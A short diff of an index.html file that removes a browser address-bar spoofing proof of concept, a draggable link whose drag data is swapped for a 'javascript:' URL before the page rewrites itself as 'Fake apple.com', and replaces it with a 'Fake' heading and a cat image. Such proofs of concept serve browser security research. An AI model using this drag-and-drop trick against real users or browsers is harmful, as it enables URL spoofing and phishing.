--- a/index.html
+++ b/index.html
@@ -1,15 +1,3 @@
-
-    <body>
-    <h1><a href="http://www.apple.com" id="a">DRAG ME TO Omnibox</a></h1>
-    </body>
-    <script>
-    var spoof_url = 'www.apple.com';
-    spoof_url = 'javascript:' + spoof_url;
-    ondragstart= function() {
-      event.dataTransfer.setData('text/plain',spoof_url);
-    }
-    ondragend = function(){
-      document.title = 'Done';
-      document.write('<h1>Fake apple.com</h1>');
-    }
-    </script>
+<h1>Fake</h1>
+<br>
+<img src="https://png.pngtree.com/png-clipart/20241231/original/pngtree-gif-transparent-cat-claws-png-image_18455706.png" width="400" heigth="400">
